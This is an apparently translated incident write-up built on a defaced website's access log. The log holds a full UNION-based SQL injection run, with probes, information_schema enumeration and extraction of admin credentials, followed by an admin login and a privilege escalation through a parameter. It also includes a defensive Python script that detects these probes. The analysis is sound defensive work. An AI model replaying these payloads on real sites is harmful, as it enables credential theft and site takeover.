A friend's website was hacked and the homepage defaced
I took a look at the log and found something interesting
85.237.211.211 - - [16/Mar/2013:06:33:46 +0800] "GET /manager.php HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:33:47 +0800] "GET /news.php?id=76 HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:33:50 +0800] "GET /news.php?id=999999.9 HTTP/1.1" 200 12580
85.237.211.211 - - [16/Mar/2013:06:33:52 +0800] "GET /news.php?id=76+and+1%3D1 HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:33:53 +0800] "GET /news.php?id=76+and+1%3E1 HTTP/1.1" 200 12580
85.237.211.211 - - [16/Mar/2013:06:33:54 +0800] "GET /news.php?id=76+and+1%3D1 HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:33:56 +0800] "GET /news.php?id=76%27 HTTP/1.1" 200 6814
85.237.211.211 - - [16/Mar/2013:06:33:57 +0800] "GET /news.php?id=%2F*%2130000+76*%2F HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:34:00 +0800] "GET /news.php?id=%2F*%2140100+76*%2F HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:34:02 +0800] "GET /news.php?id=%2F*%2150000+76*%2F HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:34:03 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:34:04 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:05 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:06 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:07 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:08 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:10 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:11 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:12 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12620
85.237.211.211 - - [16/Mar/2013:06:34:14 +0800] "GET /news.php?id=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12620
85.237.211.211 - - [16/Mar/2013:06:34:15 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12635
85.237.211.211 - - [16/Mar/2013:06:34:16 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12623
85.237.211.211 - - [16/Mar/2013:06:34:26 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12615
85.237.211.211 - - [16/Mar/2013:06:34:27 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28table_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12668
85.237.211.211 - - [16/Mar/2013:06:34:32 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28column_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12616
85.237.211.211 - - [16/Mar/2013:06:34:34 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28column_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12695
Pulling the DB structure out of information_schema
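As an added example (not code from the post), a small Python triage script that applies the detection idea this log illustrates: it parses Apache-style access lines, flags the boolean, version-comment, UNION and information_schema probes per client IP, and decodes the MySQL 0x... literals so the defender can see which schema and table were being enumerated. The sample lines are constructed and shortened from the ones quoted above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample, shortened from the post's log (not the real file)
SAMPLE_LOG = """\
85.237.211.211 - - [16/Mar/2013:06:33:47 +0800] "GET /news.php?id=76 HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:33:52 +0800] "GET /news.php?id=76+and+1%3D1 HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:33:57 +0800] "GET /news.php?id=%2F*%2130000+76*%2F HTTP/1.1" 200 12754
85.237.211.211 - - [16/Mar/2013:06:34:04 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536-- HTTP/1.1" 200 6728
85.237.211.211 - - [16/Mar/2013:06:34:32 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+count%28column_name%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29-- HTTP/1.1" 200 12616
114.46.219.96 - - [16/Mar/2013:06:34:38 +0800] "GET / HTTP/1.1" 200 1191
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Each rule is matched against the URL-decoded, lower-cased query string
RULES = [
    ("boolean_probe", re.compile(r"\b(and|or)\s+\d+\s*[=<>]+\s*\d+")),  # 76 and 1=1
    ("version_comment", re.compile(r"/\*!\d{5}")),                       # /*!30000 76*/
    ("union_select", re.compile(r"\bunion\b.*\bselect\b")),
    ("schema_enum", re.compile(r"information_schema")),
]
HEX_RE = re.compile(r"0x([0-9a-f]{2,})")

def decode_hex_literals(query):
    """Turn MySQL 0x... literals into text; this is how the attacker hid
    the schema and table names they were enumerating."""
    out = []
    for h in HEX_RE.findall(query):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass  # odd length or non-text literal: leave it out
    return out

def analyse(line):
    """Return ip, script path, triggered rule names and decoded literals, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group("path").partition("?")
    query = unquote_plus(raw_query).lower()
    hits = [name for name, rx in RULES if rx.search(query)]
    return {"ip": m.group("ip"), "path": path, "hits": hits,
            "literals": decode_hex_literals(query)}

def suspicious_ips(log_text):
    """Map each client IP that triggered a rule to the sorted rule names."""
    report = {}
    for line in log_text.splitlines():
        r = analyse(line)
        if r and r["hits"]:
            report.setdefault(r["ip"], set()).update(r["hits"])
    return {ip: sorted(names) for ip, names in report.items()}
```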
114.46.219.96 - - [16/Mar/2013:06:34:38 +0800] "GET / HTTP/1.1" 200 1191
114.46.219.96 - - [16/Mar/2013:06:34:40 +0800] "GET /Scripts/AC_RunActiveContent.js HTTP/1.1" 200 2413
114.46.219.96 - - [16/Mar/2013:06:34:40 +0800] "GET /js/jquery-1.7.1.min.js HTTP/1.1" 200 33140
85.237.211.211 - - [16/Mar/2013:06:34:40 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28*%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12615
85.237.211.211 - - [16/Mar/2013:06:34:42 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admin+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12619
85.237.211.211 - - [16/Mar/2013:06:34:43 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12624
85.237.211.211 - - [16/Mar/2013:06:34:45 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x27%2C0x7e%2Cunhex%28Hex%28cast%28admin.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12619
85.237.211.211 - - [16/Mar/2013:06:34:46 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12624
85.237.211.211 - - [16/Mar/2013:06:34:47 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+2%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 12617
With the password in hand, they simply logged in
85.237.211.211 - - [16/Mar/2013:06:35:12 +0800] "POST /admin/login.php HTTP/1.1" 302 1129
85.237.211.211 - - [16/Mar/2013:06:35:13 +0800] "GET /admin/index.php HTTP/1.1" 200 712
85.237.211.211 - - [16/Mar/2013:06:35:17 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:17 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:18 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:28 +0800] "GET /admin/administrator.php HTTP/1.1" 200 1303
85.237.211.211 - - [16/Mar/2013:06:35:30 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:31 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:32 +0800] "GET /favicon.ico HTTP/1.1" 404 289
85.237.211.211 - - [16/Mar/2013:06:35:34 +0800] "GET /admin/administrator-editor.php?a_contorller=admin HTTP/1.1" 200 1421
Change one parameter to admin and you get admin.... With code written like this, a junior clerk could make themselves the boss...
Looks like... when interviewing PHP developers, SQL injection really has to be a mandatory exam question